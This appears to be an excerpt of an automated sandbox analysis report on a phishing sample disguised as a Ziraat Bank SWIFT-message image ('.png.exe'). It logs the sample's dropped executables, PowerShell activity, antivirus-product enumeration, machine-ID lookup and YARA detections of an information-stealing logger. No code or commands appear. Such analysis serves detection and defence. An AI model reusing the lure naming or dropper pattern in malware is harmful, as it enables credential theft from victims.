Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Queries volume information: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

Code function: 9_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

9_2_00412A15

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected MSIL Logger

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
